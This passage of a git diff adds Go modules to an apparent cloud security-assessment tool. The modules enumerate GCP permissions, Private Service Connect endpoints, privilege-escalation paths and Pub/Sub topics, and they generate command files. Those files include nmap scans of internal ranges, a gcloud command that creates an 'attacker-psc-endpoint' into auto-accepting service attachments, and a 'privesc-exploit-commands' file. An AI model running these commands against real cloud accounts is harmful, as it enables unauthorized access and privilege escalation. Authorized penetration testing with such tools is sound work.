formatPermFederatedInfo formats federated identity info for display +func formatPermFederatedInfo(info PermFederatedIdentityInfo) string { + if !info.IsFederated { + return "-" + } + + result := info.ProviderType + + // Show subject (specific identity like repo/workflow) if available + if info.Subject != "" { + result += ": " + info.Subject + } else if info.Attribute != "" { + result += " [" + info.Attribute + "]" + } + + // Add pool name in parentheses + if info.PoolName != "" { + result += " (pool: " + info.PoolName + ")" + } + + return result +} + +// formatCondition formats a condition for display +func formatPermissionCondition(hasCondition bool, condition, conditionTitle string) string { + if !hasCondition { + return "No" + } + + if conditionTitle != "" { + return conditionTitle + } + + // Parse common patterns + if strings.Contains(condition, "request.time") { + return "[time-limited]" + } + if strings.Contains(condition, "resource.name") { + return "[resource-scoped]" + } + if strings.Contains(condition, "origin.ip") || strings.Contains(condition, "request.origin") { + return "[IP-restricted]" + } + if strings.Contains(condition, "device") { + return "[device-policy]" + } + + return "Yes" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single unified table with all permissions + header := []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Entity Type", + "Identity", + "Permission", + "Role", + "Custom Role", + "Inherited", + "Inherited From", + "Condition", + "Cross-Project", + "High Privilege", + "Federated", + } + + var body [][]string + for _, ep := range m.ExplodedPerms { + isCustom := "No" + if ep.RoleType == "custom" || strings.HasPrefix(ep.Role, "projects/") || strings.HasPrefix(ep.Role, "organizations/") { + isCustom = "Yes" + } + + inherited := "No" + if ep.IsInherited { + inherited = "Yes" + } + + inheritedFrom := "-" + if ep.IsInherited && ep.InheritedFrom != "" { + inheritedFrom = ep.InheritedFrom + } + + condition := formatPermissionCondition(ep.HasCondition, ep.Condition, ep.ConditionTitle) + + crossProject := "No" + if ep.IsCrossProject { + crossProject = fmt.Sprintf("Yes (from %s)", ep.SourceProject) + } + + highPriv := "No" + if ep.IsHighPrivilege { + highPriv = "Yes" + } + + // Check for federated identity + federated := formatPermFederatedInfo(parsePermFederatedIdentity(ep.EntityEmail)) + + body = append(body, []string{ + ep.ResourceScopeType, + ep.ResourceScopeID, + ep.ResourceScopeName, + ep.EntityType, + ep.EntityEmail, + ep.Permission, + ep.Role, + isCustom, + inherited, + inheritedFrom, + condition, + crossProject, + highPriv, + federated, + }) + } + + // Sort by scope type (org first, then folder, then project), then entity, then permission + scopeOrder := map[string]int{"organization": 0, "folder": 1, "project": 2} + sort.Slice(body, func(i, j int) bool { + if body[i][0] != body[j][0] { + return scopeOrder[body[i][0]] < scopeOrder[body[j][0]] + } + if body[i][4] != body[j][4] { + return body[i][4] < body[j][4] + } + return body[i][5] < body[j][5] + }) + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "permissions", + Header: header, + Body: body, + }, + } + + // Log findings + highPrivCount := 0 + crossProjectCount := 0 + for _, ep := range m.ExplodedPerms { + if ep.IsHighPrivilege { + highPrivCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } + } + + if highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege permission entries!", highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + if crossProjectCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d cross-project permission entries!", crossProjectCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + output := PermissionsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + scopeType, + scopeIdentifiers, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/privateserviceconnect.go b/gcp/commands/privateserviceconnect.go new file mode 100644 index 00000000..774a742d --- /dev/null +++ b/gcp/commands/privateserviceconnect.go @@ -0,0 +1,482 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + networkendpointsservice "github.com/BishopFox/cloudfox/gcp/services/networkEndpointsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPrivateServiceConnectCommand = &cobra.Command{ + Use: "private-service-connect", + Aliases: []string{"psc", "private-endpoints", "internal-endpoints"}, + Short: "Enumerate Private Service Connect endpoints and service attachments", + Long: `Enumerate Private Service Connect (PSC) endpoints, private connections, and service attachments. + +Private Service Connect allows private connectivity to Google APIs and services, +as well as to services hosted by other organizations. + +Security Relevance: +- PSC endpoints provide internal network paths to external services +- Service attachments expose internal services to other projects +- Private connections (VPC peering for managed services) provide access to Cloud SQL, etc. +- These can be used for lateral movement or data exfiltration + +What this module finds: +- PSC forwarding rules (consumer endpoints) +- Service attachments (producer endpoints) +- Private service connections (e.g., to Cloud SQL private IPs) +- Connection acceptance policies (auto vs manual) + +Output includes nmap commands for scanning internal endpoints.`, + Run: runGCPPrivateServiceConnectCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PrivateServiceConnectModule struct { + gcpinternal.BaseGCPModule + + PSCEndpoints []networkendpointsservice.PrivateServiceConnectEndpoint + PrivateConnections []networkendpointsservice.PrivateConnection + ServiceAttachments []networkendpointsservice.ServiceAttachment + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PrivateServiceConnectOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PrivateServiceConnectOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PrivateServiceConnectOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPrivateServiceConnectCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "private-service-connect") + if err != nil { + return + } + + module := &PrivateServiceConnectModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + PSCEndpoints: []networkendpointsservice.PrivateServiceConnectEndpoint{}, + PrivateConnections: []networkendpointsservice.PrivateConnection{}, + ServiceAttachments: []networkendpointsservice.ServiceAttachment{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PrivateServiceConnectModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "private-service-connect", m.processProject) + + totalFindings := len(m.PSCEndpoints) + len(m.PrivateConnections) + len(m.ServiceAttachments) + + if totalFindings == 0 { + logger.InfoM("No private service connect endpoints found", "private-service-connect") + return + } + + logger.SuccessM(fmt.Sprintf("Found %d PSC endpoint(s), %d private connection(s), %d service attachment(s)", + len(m.PSCEndpoints), len(m.PrivateConnections), len(m.ServiceAttachments)), "private-service-connect") + + // Count high-risk findings + autoAcceptCount := 0 + for _, sa := range m.ServiceAttachments { + if sa.ConnectionPreference == "ACCEPT_AUTOMATIC" { + autoAcceptCount++ + } + } + if autoAcceptCount > 0 { + logger.InfoM(fmt.Sprintf("[High] %d service attachment(s) auto-accept connections from any project", autoAcceptCount), "private-service-connect") + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PrivateServiceConnectModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking private service connect in project: %s", projectID), "private-service-connect") + } + + svc := networkendpointsservice.New() + + // Get PSC endpoints + pscEndpoints, err := svc.GetPrivateServiceConnectEndpoints(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get PSC endpoints in project %s", projectID)) + } + + // Get private connections + privateConns, err := svc.GetPrivateConnections(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get private connections in project %s", projectID)) + } + + // Get service attachments + attachments, err := svc.GetServiceAttachments(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get service attachments in project %s", projectID)) + } + + m.mu.Lock() + m.PSCEndpoints = append(m.PSCEndpoints, pscEndpoints...) + m.PrivateConnections = append(m.PrivateConnections, privateConns...) + m.ServiceAttachments = append(m.ServiceAttachments, attachments...) + + for _, endpoint := range pscEndpoints { + m.addPSCEndpointToLoot(endpoint) + } + for _, conn := range privateConns { + m.addPrivateConnectionToLoot(conn) + } + for _, attachment := range attachments { + m.addServiceAttachmentToLoot(attachment) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PrivateServiceConnectModule) initializeLootFiles() { + m.LootMap["private-service-connect-commands"] = &internal.LootFile{ + Name: "private-service-connect-commands", + Contents: "# Private Service Connect Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n" + + "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n", + } +} + +func (m *PrivateServiceConnectModule) addPSCEndpointToLoot(endpoint networkendpointsservice.PrivateServiceConnectEndpoint) { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "## PSC Endpoint: %s (Project: %s, Region: %s)\n"+ + "# Network: %s, Subnet: %s\n"+ + "# Target Type: %s, Target: %s\n"+ + "# State: %s, IP: %s\n\n"+ + "# Describe forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + endpoint.Name, endpoint.ProjectID, endpoint.Region, + endpoint.Network, endpoint.Subnetwork, + endpoint.TargetType, endpoint.Target, + endpoint.ConnectionState, endpoint.IPAddress, + endpoint.Name, endpoint.Region, endpoint.ProjectID, + ) + + if endpoint.IPAddress != "" { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "# Scan internal endpoint (from within VPC):\n"+ + "nmap -sV -Pn %s\n\n", + endpoint.IPAddress, + ) + } +} + +func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(conn networkendpointsservice.PrivateConnection) { + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") + } + + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "## Private Connection: %s (Project: %s)\n"+ + "# Network: %s, Service: %s\n"+ + "# Peering: %s\n"+ + "# Reserved Ranges: %s\n"+ + "# Accessible Services: %s\n\n"+ + "# List private connections:\n"+ + "gcloud services vpc-peerings list --network=%s --project=%s\n\n", + conn.Name, conn.ProjectID, + conn.Network, conn.Service, + conn.PeeringName, + reservedRanges, + accessibleServices, + conn.Network, conn.ProjectID, + ) + + // Add nmap commands for each reserved range + for _, ipRange := range conn.ReservedRanges { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "# Scan private connection range (from within VPC):\n"+ + "nmap -sV -Pn %s\n\n", + ipRange, + ) + } +} + +func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(attachment networkendpointsservice.ServiceAttachment) { + natSubnets := "-" + if len(attachment.NatSubnets) > 0 { + natSubnets = strings.Join(attachment.NatSubnets, ", ") + } + + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "## Service Attachment: %s (Project: %s, Region: %s)\n"+ + "# Target Service: %s\n"+ + "# Connection Preference: %s\n"+ + "# Connected Endpoints: %d\n"+ + "# NAT Subnets: %s\n", + attachment.Name, attachment.ProjectID, attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + attachment.ConnectedEndpoints, + natSubnets, + ) + + if len(attachment.ConsumerAcceptLists) > 0 { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# Accept List: %s\n", strings.Join(attachment.ConsumerAcceptLists, ", ")) + } + if len(attachment.ConsumerRejectLists) > 0 { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# Reject List: %s\n", strings.Join(attachment.ConsumerRejectLists, ", ")) + } + + // Add IAM bindings info + if len(attachment.IAMBindings) > 0 { + m.LootMap["private-service-connect-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range attachment.IAMBindings { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "\n# Describe service attachment:\n"+ + "gcloud compute service-attachments describe %s --region=%s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud compute service-attachments get-iam-policy %s --region=%s --project=%s\n\n", + attachment.Name, attachment.Region, attachment.ProjectID, + attachment.Name, attachment.Region, attachment.ProjectID, + ) + + // If auto-accept, add exploitation command + if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "# [HIGH RISK] This service attachment accepts connections from ANY project!\n"+ + "# To connect from another project:\n"+ + "gcloud compute forwarding-rules create attacker-psc-endpoint \\\n"+ + " --region=%s \\\n"+ + " --network=ATTACKER_VPC \\\n"+ + " --address=RESERVED_IP \\\n"+ + " --target-service-attachment=projects/%s/regions/%s/serviceAttachments/%s\n\n", + attachment.Region, + attachment.ProjectID, attachment.Region, attachment.Name, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PrivateServiceConnectModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // PSC Endpoints table + if len(m.PSCEndpoints) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Network", + "Subnet", + "IP Address", + "Target Type", + "Target", + "State", + } + var body [][]string + + for _, endpoint := range m.PSCEndpoints { + body = append(body, []string{ + m.GetProjectName(endpoint.ProjectID), + endpoint.ProjectID, + endpoint.Name, + endpoint.Region, + endpoint.Network, + endpoint.Subnetwork, + endpoint.IPAddress, + endpoint.TargetType, + endpoint.Target, + endpoint.ConnectionState, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "psc-endpoints", + Header: header, + Body: body, + }) + } + + // Private Connections table + if len(m.PrivateConnections) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Network", + "Service", + "Peering Name", + "Reserved Ranges", + "Accessible Services", + } + var body [][]string + + for _, conn := range m.PrivateConnections { + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") + } + + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.ProjectID, + conn.Name, + conn.Network, + conn.Service, + conn.PeeringName, + reservedRanges, + accessibleServices, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "private-connections", + Header: header, + Body: body, + }) + } + + // Service Attachments table - one row per IAM binding + if len(m.ServiceAttachments) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Target Service", + "Accept Policy", + "Connected", + "NAT Subnets", + "IAM Role", + "IAM Member", + } + var body [][]string + + for _, attachment := range m.ServiceAttachments { + natSubnets := "-" + if len(attachment.NatSubnets) > 0 { + natSubnets = strings.Join(attachment.NatSubnets, ", ") + } + + if len(attachment.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range attachment.IAMBindings { + body = append(body, []string{ + m.GetProjectName(attachment.ProjectID), + attachment.ProjectID, + attachment.Name, + attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + fmt.Sprintf("%d", attachment.ConnectedEndpoints), + natSubnets, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row with empty IAM columns + body = append(body, []string{ + m.GetProjectName(attachment.ProjectID), + attachment.ProjectID, + attachment.Name, + attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + fmt.Sprintf("%d", attachment.ConnectedEndpoints), + natSubnets, + "-", + "-", + }) + } + } + + tables = append(tables, internal.TableFile{ + Name: "service-attachments", + Header: header, + Body: body, + }) + } + + // Collect loot files - only include if they have content beyond the header + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := PrivateServiceConnectOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "private-service-connect") + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go new file mode 100644 index 00000000..f6b5a81b --- /dev/null +++ b/gcp/commands/privesc.go @@ -0,0 +1,191 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPrivescCommand = &cobra.Command{ + Use: globals.GCP_PRIVESC_MODULE_NAME, + Aliases: []string{"pe", "escalate", "priv"}, + Short: "Identify privilege escalation paths in GCP projects", + Long: `Analyze GCP IAM policies to identify privilege escalation opportunities. + +This module examines IAM bindings to find principals with dangerous permissions +that could be used to escalate privileges within the GCP environment. + +Detected privilege escalation methods include: +- Service Account Token Creation (iam.serviceAccounts.getAccessToken) +- Service Account Key Creation (iam.serviceAccountKeys.create) +- Project/Folder/Org IAM Policy Modification +- Compute Instance Metadata Injection (SSH keys, startup scripts) +- Cloud Functions/Run Deployment with SA Identity +- Cloud Build SA Abuse +- GKE Cluster Access +- Secret Manager Access +- Signed URL/JWT Generation`, + Run: runGCPPrivescCommand, +} + +type PrivescModule struct { + gcpinternal.BaseGCPModule + Paths []privescservice.PrivescPath + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type PrivescOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PrivescOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PrivescOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPPrivescCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PRIVESC_MODULE_NAME) + if err != nil { + return + } + + module := &PrivescModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Paths: []privescservice.PrivescPath{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PRIVESC_MODULE_NAME, m.processProject) + + if len(m.Paths) == 0 { + logger.InfoM("No privilege escalation paths found", globals.GCP_PRIVESC_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d privilege escalation path(s)", len(m.Paths)), globals.GCP_PRIVESC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *PrivescModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing privilege escalation in project: %s", projectID), globals.GCP_PRIVESC_MODULE_NAME) + } + + svc := privescservice.New() + paths, err := svc.AnalyzeProjectPrivesc(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, + fmt.Sprintf("Could not analyze privilege escalation in project %s", projectID)) + return + } + + m.mu.Lock() + m.Paths = append(m.Paths, paths...) + for _, path := range paths { + m.addPathToLoot(path) + } + m.mu.Unlock() +} + +func (m *PrivescModule) initializeLootFiles() { + m.LootMap["privesc-exploit-commands"] = &internal.LootFile{ + Name: "privesc-exploit-commands", + Contents: "# GCP Privilege Escalation Exploit Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *PrivescModule) addPathToLoot(path privescservice.PrivescPath) { + m.LootMap["privesc-exploit-commands"].Contents += fmt.Sprintf( + "# Method: %s\n"+ + "# Principal: %s (%s)\n"+ + "# Project: %s\n"+ + "# Target: %s\n"+ + "# Permissions: %s\n"+ + "%s\n\n", + path.Method, + path.Principal, path.PrincipalType, + path.ProjectID, + path.TargetResource, + strings.Join(path.Permissions, ", "), + path.ExploitCommand, + ) +} + +func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Privesc table + // Reads: Source principal can perform action (method) on target resource + header := []string{ + "Project Name", + "Project ID", + "Source Principal", + "Source Principal Type", + "Action (Method)", + "Target Resource", + "Permissions", + } + + var body [][]string + for _, path := range m.Paths { + body = append(body, []string{ + m.GetProjectName(path.ProjectID), + path.ProjectID, + path.Principal, + path.PrincipalType, + path.Method, + path.TargetResource, + strings.Join(path.Permissions, ", "), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{} + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "privesc", + Header: header, + Body: body, + }) + } + + output := PrivescOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + scopeNames, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PRIVESC_MODULE_NAME) + } +} diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go new file mode 100644 index 00000000..555fdd52 --- /dev/null +++ b/gcp/commands/pubsub.go @@ -0,0 +1,486 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + PubSubService "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPubSubCommand = &cobra.Command{ + Use: globals.GCP_PUBSUB_MODULE_NAME, + Aliases: []string{"ps", "topics", "subscriptions"}, + Short: "Enumerate Pub/Sub topics and subscriptions with security analysis", + Long: `Enumerate Pub/Sub topics and subscriptions across projects with security-relevant details. + +Features: +- Lists all Pub/Sub topics and subscriptions +- Shows IAM configuration and public access +- Identifies push endpoints and their configurations +- Shows dead letter topics and retry policies +- Detects BigQuery and Cloud Storage exports +- Generates gcloud commands for further analysis + +Security Columns: +- PublicPublish: Whether allUsers/allAuthenticatedUsers can publish +- PublicSubscribe: Whether allUsers/allAuthenticatedUsers can subscribe +- KMS: Customer-managed encryption key status +- PushEndpoint: External URL receiving messages (data exfiltration risk) +- Exports: BigQuery/Cloud Storage export destinations + +Attack Surface: +- Public topics allow message injection +- Public subscriptions allow message reading +- Push endpoints may leak sensitive data +- Cross-project subscriptions indicate trust relationships`, + Run: runGCPPubSubCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PubSubModule struct { + gcpinternal.BaseGCPModule + + Topics []PubSubService.TopicInfo + Subscriptions []PubSubService.SubscriptionInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PubSubOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PubSubOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PubSubOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPubSubCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PUBSUB_MODULE_NAME) + if err != nil { + return + } + + module := &PubSubModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Topics: []PubSubService.TopicInfo{}, + Subscriptions: []PubSubService.SubscriptionInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBSUB_MODULE_NAME, m.processProject) + + totalResources := len(m.Topics) + len(m.Subscriptions) + if totalResources == 0 { + logger.InfoM("No Pub/Sub topics or subscriptions found", globals.GCP_PUBSUB_MODULE_NAME) + return + } + + // Count public resources and push subscriptions + publicTopics := 0 + publicSubs := 0 + pushSubs := 0 + for _, topic := range m.Topics { + for _, binding := range topic.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + publicTopics++ + break + } + } + } + for _, sub := range m.Subscriptions { + for _, binding := range sub.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + publicSubs++ + break + } + } + if sub.PushEndpoint != "" { + pushSubs++ + } + } + + msg := fmt.Sprintf("Found %d topic(s), %d subscription(s)", len(m.Topics), len(m.Subscriptions)) + if publicTopics > 0 || publicSubs > 0 { + msg += fmt.Sprintf(" (%d public topics, %d public subs)", publicTopics, publicSubs) + } + if pushSubs > 0 { + msg += fmt.Sprintf(" [%d push endpoints]", pushSubs) + } + logger.SuccessM(msg, globals.GCP_PUBSUB_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PubSubModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Pub/Sub in project: %s", projectID), globals.GCP_PUBSUB_MODULE_NAME) + } + + ps := PubSubService.New() + + // Get topics + topics, err := ps.Topics(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, + fmt.Sprintf("Could not enumerate Pub/Sub topics in project %s", projectID)) + } else { + m.mu.Lock() + m.Topics = append(m.Topics, topics...) + for _, topic := range topics { + m.addTopicToLoot(topic) + } + m.mu.Unlock() + } + + // Get subscriptions + subs, err := ps.Subscriptions(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, + fmt.Sprintf("Could not enumerate Pub/Sub subscriptions in project %s", projectID)) + } else { + m.mu.Lock() + m.Subscriptions = append(m.Subscriptions, subs...) + for _, sub := range subs { + m.addSubscriptionToLoot(sub) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d topic(s), %d subscription(s) in project %s", len(topics), len(subs), projectID), globals.GCP_PUBSUB_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PubSubModule) initializeLootFiles() { + m.LootMap["pubsub-commands"] = &internal.LootFile{ + Name: "pubsub-commands", + Contents: "# Pub/Sub Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *PubSubModule) addTopicToLoot(topic PubSubService.TopicInfo) { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "## Topic: %s (Project: %s)\n"+ + "# Subscriptions: %d\n", + topic.Name, topic.ProjectID, + topic.SubscriptionCount, + ) + + if topic.KmsKeyName != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", topic.KmsKeyName) + } + + if len(topic.IAMBindings) > 0 { + m.LootMap["pubsub-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range topic.IAMBindings { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "\n# Describe topic:\n"+ + "gcloud pubsub topics describe %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud pubsub topics get-iam-policy %s --project=%s\n\n"+ + "# List subscriptions:\n"+ + "gcloud pubsub topics list-subscriptions %s --project=%s\n\n"+ + "# Publish a message:\n"+ + "gcloud pubsub topics publish %s --message='test' 